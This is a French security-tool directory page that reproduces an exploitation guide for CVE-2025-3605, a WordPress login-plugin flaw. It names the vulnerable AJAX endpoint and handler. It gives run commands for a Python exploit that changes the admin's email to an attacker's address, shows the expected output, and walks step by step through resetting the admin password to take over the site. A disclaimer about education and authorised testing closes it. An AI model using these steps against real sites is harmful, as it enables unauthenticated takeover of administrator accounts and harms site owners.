Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3605 — WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 est vulnérable à l'escalade de privilèges. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-3605
Escalade de PrivilègesAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-3605

CVE-2025-3605

WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 est vulnérable à l'escalade de privilèges.

Voir le dépôt
23il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚀 Guide d'exploitation CVE-2025-3605

🛡️ Résumé de la vulnérabilité

Le plugin Frontend Login and Registration Blocks pour WordPress (versions <= 1.0.7) est vulnérable à une escalade de privilèges via une prise de contrôle de compte.
Le problème survient car le plugin ne valide pas l'identité de l'utilisateur lors de la mise à jour de détails sensibles comme l'email via la fonction flr_blocks_user_settings_handle_ajax_callback().

✅ Impact :
Un attaquant non authentifié peut changer l'email de l'administrateur, déclencher le processus "Mot de passe oublié", et réinitialiser le mot de passe admin, obtenant ainsi un contrôle total.


💥 Preuve de concept (PoC)

Le script Python inclus automatise le processus d'exploitation en ciblant le point de terminaison AJAX vulnérable :

root@kitploit:~
/wp-admin/admin-ajax.php

Il met à jour l'email de l'utilisateur ciblé (généralement user_id 1 pour l'admin) avec un email contrôlé par l'attaquant.


📦 Script inclus

Nom du fichier : CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ Valeurs par défaut :

  • --user_id: 1 (admin par défaut)
  • --mail: [email protected]

🖥️ Utilisation et aide

Pour voir le menu d'aide, exécutez :

root@kitploit:~
python CVE-2025-3605.py --help

Sortie :

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ Exemple d'exécution :

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 Sortie attendue

✅ En cas de succès :

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ En cas d'échec :

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 Après l'exploitation

1️⃣ Accédez à :

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ Saisissez le nouvel email que vous avez défini ([email protected]).

3️⃣ Demandez une réinitialisation du mot de passe.

4️⃣ Définissez un nouveau mot de passe.

5️⃣ Connectez-vous en tant qu'administrateur et profitez d'un accès complet.


⚠️ Avertissement

Cet exploit et ce script sont fournis uniquement à des fins éducatives et de tests autorisés.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester est illégale et contraire à l'éthique.


Par : Khaled Alenazi (Nxploited)

Télécharger l’outil